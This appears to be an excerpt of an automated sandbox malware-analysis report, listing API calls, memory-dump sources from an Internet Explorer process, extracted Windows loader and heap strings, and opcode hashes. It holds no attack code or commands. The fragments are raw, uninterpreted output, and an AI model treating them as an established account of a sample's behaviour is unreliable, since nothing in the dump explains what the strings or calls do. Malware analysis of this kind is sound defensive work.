                                  control_flow_graph 181 41a7c0-41a7f4 call 41af50 LookupPrivilegeValueW
                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_iexplore.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0

                                  Control-flow Graph

                                  control_flow_graph 190 41a6a0-41a6c8 call 41af50 ExitProcess
                                  APIs
                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_iexplore.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID:
                                  • API String ID: 621844428-0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-2160512332
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                  • API String ID: 0-3591852110
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                  • API String ID: 0-3532704233
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                  • API String ID: 0-3063724069
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                  Strings
                                  • @, xrefs: 036AD0FD
                                  • @, xrefs: 036AD313
                                  • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 036AD146
                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 036AD2C3
                                  • @, xrefs: 036AD2AF
                                  • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 036AD0CF
                                  • Control Panel\Desktop\LanguageConfiguration, xrefs: 036AD196
                                  • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 036AD262
                                  • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                  • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                  • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                  Strings
                                  • Kernel-MUI-Language-Disallowed, xrefs: 036D5352
                                  • Kernel-MUI-Language-SKU, xrefs: 036D542B
                                  • WindowsExcludedProcs, xrefs: 036D522A
                                  • Kernel-MUI-Number-Allowed, xrefs: 036D5247
                                  • Kernel-MUI-Language-Allowed, xrefs: 036D527B
                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                  • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                  Strings
                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 037221D9, 037222B1
                                  • .Local, xrefs: 036E28D8
                                  • SXS: %s() passed the empty activation context, xrefs: 037221DE
                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 037222B6
                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                  • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                  • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                  • String ID: FilterFullPath$UseFilter$\??\
                                  • String ID: %$&$@
                                  Strings
                                  • TargetNtPath, xrefs: 0378B82F
                                  • GlobalizationUserSettings, xrefs: 0378B834
                                  • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 0378B82A
                                  • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                  Strings
                                  • HEAP[%wZ]: , xrefs: 0370E6A6
                                  • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0370E6C6
                                  • HEAP: , xrefs: 0370E6B3
                                  • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                  Strings
                                  • minkernel\ntdll\ldrinit.c, xrefs: 037282E8
                                  • Failed to reallocate the system dirs string !, xrefs: 037282D7
                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 037282DE
                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                  Strings
                                  • @, xrefs: 0376C1F1
                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0376C1C5
                                  • PreferredUILanguages, xrefs: 0376C212
                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                  Strings
                                  • LdrpCheckRedirection, xrefs: 0373488F
                                  • minkernel\ntdll\ldrredirect.c, xrefs: 03734899
                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 03734888
                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                  Strings
                                  • Actx , xrefs: 036E33AC
                                  • SXS: %s() passed the empty activation context data, xrefs: 037229FE
                                  • RtlCreateActivationContext, xrefs: 037229F9
                                  • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                  Strings
                                  • @, xrefs: 036F12A5
                                  • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 036F127B
                                  • BuildLabEx, xrefs: 036F130F
                                  • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                  Strings
                                  • minkernel\ntdll\ldrinit.c, xrefs: 03732104
                                  • LdrpInitializationFailure, xrefs: 037320FA
                                  • Process initialization failed with status 0x%08lx, xrefs: 037320F3
                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: #%u
                                  • API String ID: 48624451-232158463
                                  • Opcode ID: 413288668dd2644e435705da7e33234d7dccdc91b3c1bafb1e6b265ab1c419fb
                                  • Instruction ID: 2d96a79c05b942d6437ed00470c446ee6940c2aac7d4761a26da86db0a3c324b
                                  • Opcode Fuzzy Hash: 413288668dd2644e435705da7e33234d7dccdc91b3c1bafb1e6b265ab1c419fb
                                  • Instruction Fuzzy Hash: 9F715C76A00249DFDB01DFA9C994BEEB7F8EF08704F154069E905EB251EA34ED11CB64
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$@
                                  • API String ID: 0-149943524
                                  • Opcode ID: 7825d79435dc721df366ad6bb05bb78bc075e6827438b7af4939ade12da8aebe
                                  • Instruction ID: 24a17d028324168c2a9cb6a9c7b47a75957a92713ce4f0b77f2cb7f48c91a4c8
                                  • Opcode Fuzzy Hash: 7825d79435dc721df366ad6bb05bb78bc075e6827438b7af4939ade12da8aebe
                                  • Instruction Fuzzy Hash: 9B32DF755183918BCB24CF1AC98073EF7E5EF86740F18491EFA869B2A0E734E851CB52
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: `$`
                                  • API String ID: 0-197956300
                                  • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                  • Instruction ID: adea8d322b4f721e99e87b3421211a63a6805316a64bfd599853bcd0f9614553
                                  • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                  • Instruction Fuzzy Hash: ACC1BC312043429BEF64CF28C845B6FFBE5AF84358F184A2DF995CA290D775E505CB92
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $$$
                                  • API String ID: 0-233714265
                                  • Opcode ID: 25a738bf49c420346c2abb3076c7d076005c49e64d6326cca2d32e48a3012473
                                  • Instruction ID: c7f8fd37cb0161b82a75d42341c73b122d8f42a505dee62e86f7b9661830a5c6
                                  • Opcode Fuzzy Hash: 25a738bf49c420346c2abb3076c7d076005c49e64d6326cca2d32e48a3012473
                                  • Instruction Fuzzy Hash: 7161CA76A11789DBDB20DFA8C684BACF7B2FF44704F18406DD105AF680CB74A945CB94
                                  Strings
                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 036BA2FB
                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 036BA309
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                  • API String ID: 0-2876891731
                                  • Opcode ID: b729a2693275a8e4cb3672e9b18c3620ec0065e9569322eb6c9c3a396ec0b8cb
                                  • Instruction ID: b3ee9e5dc192504561e66e7c6e6ab3b87afb1728bebdf0bef02880ce224e3d77
                                  • Opcode Fuzzy Hash: b729a2693275a8e4cb3672e9b18c3620ec0065e9569322eb6c9c3a396ec0b8cb
                                  • Instruction Fuzzy Hash: 6341AC35A04659DBCB21DF99C944BAEB7B4EF85700F2884A9EC01DB392E235D981CF60
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .Local\$@
                                  • API String ID: 0-380025441
                                  • Opcode ID: 0c61a78ce71894e68c649fbeff47e8f8f8af3eb52696180ba5c2b58ba093f04f
                                  • Instruction ID: de972e2453f9d06ae4d59c117638fe8b587228f201fcb309d0807892f58e82c4
                                  • Opcode Fuzzy Hash: 0c61a78ce71894e68c649fbeff47e8f8f8af3eb52696180ba5c2b58ba093f04f
                                  • Instruction Fuzzy Hash: 8631C47A109344AFC311DF28C580E6BFBE8EB85654F58092EF59587350DA34DD09CB92
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: MUI
                                  • API String ID: 0-1339004836
                                  • Opcode ID: 31b6bbf6ad5f3e033ba660bd65580cb18c41fae6f565bbf440eaabb5e81801b6
                                  • Instruction ID: 5b28f105aaeb9e252c7074ac68bb303d7ce28c3fba05fa0a8c7fd35ae8bf4b19
                                  • Opcode Fuzzy Hash: 31b6bbf6ad5f3e033ba660bd65580cb18c41fae6f565bbf440eaabb5e81801b6
                                  • Instruction Fuzzy Hash: E1825B75E002589FDB24CFA9C980BEDFBB9BF49310F188169E859AB350D7709A81CF54
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @
                                  • API String ID: 0-2766056989
                                  • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                  • Instruction ID: cc46ba273ba2bcf0b737072bdd81ce32634dfafa054655181dc425ff88ce8cc7
                                  • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                  • Instruction Fuzzy Hash: 34613A76D00219AFDB21DFA9C840BEEBBF4EF84714F144969E910B7290D7749A41CF60
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: PreferredUILanguages
                                  • API String ID: 0-1884656846
                                  • Opcode ID: 080f0d7bc29b6eeb739b19c7ab842fe628eaa90976c275b304f8fcf5b65c90e7
                                  • Instruction ID: 4bf774e54d5707fc31d6b833564caef24df0c4a77a533bfc093b4d454579b932
                                  • Opcode Fuzzy Hash: 080f0d7bc29b6eeb739b19c7ab842fe628eaa90976c275b304f8fcf5b65c90e7
                                  • Instruction Fuzzy Hash: 6B41BB36E00219ABCB11EAA7C850BEEF7B9EF89750F050169ED11EB250E674DD40C7A4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: BinaryHash
                                  • API String ID: 0-2202222882
                                  • Opcode ID: cee81befe9a2e373cab825fe2b89e7278605a1a23fb7411457246e86118fd404
                                  • Instruction ID: 2d03ded4d8ac9eb9f6149a0f1dd197babb6254dbfa1ce23feb4c10e4f4b35140
                                  • Opcode Fuzzy Hash: cee81befe9a2e373cab825fe2b89e7278605a1a23fb7411457246e86118fd404
                                  • Instruction Fuzzy Hash: B94146B5D0062DAFDB21DA50CC85FDEB77CAB45714F0085E9EB08AB140DB709E499F98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: verifier.dll
                                  • API String ID: 0-3265496382
                                  • Opcode ID: 5110f6605d2c803c9e60660e7d338206b0c5dc29868375d930c23caad3a31f2d
                                  • Instruction ID: a4fecabd83abdc1e027795c3c2f44ed0ce64f2de2d1010c378d76a90cb79be2a
                                  • Opcode Fuzzy Hash: 5110f6605d2c803c9e60660e7d338206b0c5dc29868375d930c23caad3a31f2d
                                  • Instruction Fuzzy Hash: AE3195B6700301AFDB24DF299850BA6B6E5EBCB710F588479E745DF282E7B18C819750
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: kLsE
                                  • API String ID: 0-3058123920
                                  • Opcode ID: 3dbf195eb68324260186377ad7f475cea9efb701aaca5ee742195c215b8d0b8b
                                  • Instruction ID: b0fcd2e7f633fa623cbe34a26a562d1c9c8208e6ffed236bccfe97021b963000
                                  • Opcode Fuzzy Hash: 3dbf195eb68324260186377ad7f475cea9efb701aaca5ee742195c215b8d0b8b
                                  • Instruction Fuzzy Hash: EB413A36501B944BE728FB74E849B65BBE4A7C0754F1C821DFC505E1C5C7F94485CBA1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Actx
                                  • API String ID: 0-89312691
                                  • Opcode ID: 611643bdac842f4a1201b0efc4246114afc509af7f0055b6a794802e3b2520ab
                                  • Instruction ID: a56ed1a74c5c43940926b426032d3ae3275988410d9d7848103547e684280785
                                  • Opcode Fuzzy Hash: 611643bdac842f4a1201b0efc4246114afc509af7f0055b6a794802e3b2520ab
                                  • Instruction Fuzzy Hash: 9B1193317456429BDB34DD1D89506F6B7B9EB87224F3C812AEA53CB390D671D8C28F80
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LdrCreateEnclave
                                  • API String ID: 0-3262589265
                                  • Opcode ID: 8457b067070415a965f396bf38f76ce616e0f157036759db9946db94f63abd51
                                  • Instruction ID: 0da7110e365d75e6ce51a43df9c0d984f913fcb473ea2a3321d770cbcc50b6d2
                                  • Opcode Fuzzy Hash: 8457b067070415a965f396bf38f76ce616e0f157036759db9946db94f63abd51
                                  • Instruction Fuzzy Hash: D92134B15083449FC310EF1AC804A9BFBE8FBD6B40F404A1EB5A08B251DBB19404CB92
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3b7cd1a078c9f446e177873165be6c3814614268365783b249e0b452b03cb878
                                  • Instruction ID: c460b023555a7ddec44a828555491cf8e61850cab74841f1fac90841aadbfe67
                                  • Opcode Fuzzy Hash: 3b7cd1a078c9f446e177873165be6c3814614268365783b249e0b452b03cb878
                                  • Instruction Fuzzy Hash: AE710036200B01AFDB31DF18C854F6AB7B5EF46724F18882CE6568B2A0D774FA44DB50
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 96c103f1482813ab33322091caf19e7d49cee8358bf94f99d08a8a29cf185116
                                  • Instruction ID: 976de4fd66e4341e7db52158774670ffb3874ca5d7f59beb7b74e6a1f42bc496
                                  • Opcode Fuzzy Hash: 96c103f1482813ab33322091caf19e7d49cee8358bf94f99d08a8a29cf185116
                                  • Instruction Fuzzy Hash: CD814E75A00245DFCB09CF68C590AAEB7F1FF88310F1981A9E859EB355D734EA51CB90
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c50959fd8aacd9c7dd28b4e794355db695bb7200a0e1d48c3bc603894af9bc93
                                  • Instruction ID: 0745f4437aa0a754fdfc41a845da9a519a4f1e6fb2f8daa0f8f9ad759eec88c2
                                  • Opcode Fuzzy Hash: c50959fd8aacd9c7dd28b4e794355db695bb7200a0e1d48c3bc603894af9bc93
                                  • Instruction Fuzzy Hash: DC61E375201716AFDB15DF64C888BABFBA8FF89310F044629F9599B240DB30E910CB91
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 03013403942d6c14ddcd3174bbbf2dbe9dcc52c9c8e649160af72006a3d9c63c
                                  • Instruction ID: f8d86ca8a8e0e22e60f1c6edbdc1b9801e4bc68fa728b706e7226082924f6f8e
                                  • Opcode Fuzzy Hash: 03013403942d6c14ddcd3174bbbf2dbe9dcc52c9c8e649160af72006a3d9c63c
                                  • Instruction Fuzzy Hash: B2615075A00606EFDB18DF68C590AADFBB5FF88200F19816ED51AAB340DB34A951CFD4
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 954e97403b5df7e31897f721f26310597af523a42d9e6c642258cb9c55bae438
                                  • Instruction ID: 4a4256565fd8734184822eb506ef7675ed480807f4b24b81a6b57d2e239ebf24
                                  • Opcode Fuzzy Hash: 954e97403b5df7e31897f721f26310597af523a42d9e6c642258cb9c55bae438
                                  • Instruction Fuzzy Hash: 9E61F6352067418BDB11DF68C898BABF7E1FF86714F18446DEA858B391DB35E805CB81
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8590c3bae10a1962a3a687f8ad6d74385d202e4a5f2bad0e3fa8809112194bfb
                                  • Instruction ID: c67692d1ddbaf10d80ccca98ecad41f6f2d7e0089119720c69b1efe61756a75e
                                  • Opcode Fuzzy Hash: 8590c3bae10a1962a3a687f8ad6d74385d202e4a5f2bad0e3fa8809112194bfb
                                  • Instruction Fuzzy Hash: 80412375200B00EFDB26DF19D980B2AB7A9EF85760F14846DE5199F390DB74EC018FA4
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3177cf5cf27e6c838ddcf3b3472cbd545b611ba6da1357fcc0b21565d2514fdf
                                  • Instruction ID: 81aecbef0f115ea4bbfda71d9780233bb431f4d4b4b2913e60335920fea5092f
                                  • Opcode Fuzzy Hash: 3177cf5cf27e6c838ddcf3b3472cbd545b611ba6da1357fcc0b21565d2514fdf
                                  • Instruction Fuzzy Hash: 79510479A21695AFC711CF68C4846B9B7B0FF04710F2882ADE845DB340D738E991CBD4
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1be38f36dc3bf5673236337f54ee1e21b83ab6d79897628db69f0dd958641a4e
                                  • Instruction ID: 94717208511292ff992a39018b9319dc8ee125eedf6ed8401d62fd8b8277c5a2
                                  • Opcode Fuzzy Hash: 1be38f36dc3bf5673236337f54ee1e21b83ab6d79897628db69f0dd958641a4e
                                  • Instruction Fuzzy Hash: 64510136A00609EFEB15EB68C944BBDBBB8FF84311F18806DE5129B390DB749951CF90
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                  • Instruction ID: b22bec770f30fc6156b7183cb348ca0b5ab0095110adbb13a43ddda56814bc55
                                  • Opcode Fuzzy Hash: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                  • Instruction Fuzzy Hash: 9E516C726083429FDB20CF68C894B5ABBE5FFC8344F04892DF9959B241D734E945CB52
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
